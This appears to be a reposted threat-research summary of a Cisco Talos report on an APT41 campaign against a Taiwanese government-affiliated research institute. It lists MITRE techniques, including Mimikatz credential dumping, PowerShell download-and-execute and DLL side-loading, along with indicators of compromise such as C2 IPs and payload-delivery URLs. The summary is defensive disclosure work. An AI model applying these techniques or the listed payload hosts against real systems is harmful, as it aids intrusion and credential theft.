Threat Research

APT41 Likely Breached Taiwanese Government-Linked Research Institute Using ShadowPad and Cobalt Strike

Securonix

Cisco Talos uncovered a campaign targeting a Taiwanese government-affiliated research institute attributed to APT41, employing ShadowPad and Cobalt Strike to conduct post-compromise activities after exploiting Microsoft Office vulnerabilities. The operation shows overlaps in tactics and infrastructure with prior campaigns, indicating a sophisticated and persistent threat actor. #ShadowPad #CobaltStrike #APT41 #Taiwan #MicrosoftOfficeIME #CVE2018-0824

Keypoints

  • Malicious campaign uncovered by Cisco Talos targeting a Taiwanese government-affiliated research institute.
  • Attribution to APT41 with medium confidence, based on overlaps in TTPs, infrastructure, and malware families.
  • ShadowPad and Cobalt Strike used for post-compromise activities, including multiple deployment methods (webshells, RDP, reverse shell).
  • Exploitation of an outdated Microsoft Office IME binary (loader) and CVE-2018-0824-based payloads (UnmarshalPwn).
  • Credential harvesting with Mimikatz and WebBrowserPassView; abnormal PowerShell activity observed for script delivery.
  • Evidence of prior TTPs/infrastructure overlaps with earlier campaigns, including shared loaders and C2 patterns.
  • Two iterations of ShadowPad loaders and a Go-based Cobalt Strike anti-AV loader indicate targeted, China-linked tooling.

MITRE Techniques

  • [T1003] Credential Dumping – The actor uses Mimikatz to harvest the hashes from the lsass process address space and WebBrowserPassView to extract stored credentials from web browsers. ‘The actor uses Mimikatz to harvest the hashes from the lsass process address space and WebBrowserPassView to extract stored credentials from web browsers.’
  • [T1059.001] PowerShell – Abnormal PowerShell commands are used to download and execute scripts. ‘abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts.’
  • [T1105] Remote File Copy – PowerShell commands download malicious files from remote servers. ‘Used PowerShell commands to download malicious files from remote servers.’
  • [T1021.001] Remote Services (RDP) – Initial compromise and malware deployment occur via RDP access. ‘Exploited RDP access for initial compromise and malware deployment.’
  • [T1071] Command and Control – The malware establishes communication with C2 servers for execution and exfiltration. ‘Established communication with C2 servers for malware execution and data exfiltration.’
  • [T1574.002] DLL Side-Loading – ShadowPad loaders sideload a DLL via a legitimate Bitdefender binary to probe memory and inject. ‘ShadowPad loaders… sideloading technique… using an eleven year old executable to sideload the DLL-based ShadowPad loader.’
  • [T1068] Privilege Escalation – Exploitation of CVE-2018-0824 for local privilege escalation. ‘Exploited CVE-2018-0824 for local privilege escalation.’

Indicators of Compromise

  • [IP Address] – 103.56.114.69, 103.96.131.84, and other IPs referenced as C2 or download hosts
  • [Domain] – w2.chatgptsfit[.]com – C2 domain used for beacon communication
  • [URL] – http://45.85.76.18:443/yPc1 – C2/download endpoint
  • [URL] – https://www.nss.com[.]tw/p.ps1 – PowerShell payload delivery
  • [URL] – https://www.nss.com[.]tw/1.hta – HTML application loader
  • [File] – imjp14k.dll – ShadowPad loader component
  • [File] – service.exe – ShadowPad loader component
  • [File] – imjp14k.dll.dat – ShadowPad payload
  • [Hash] – 2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
  • [Hash] – eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28

Read more: https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint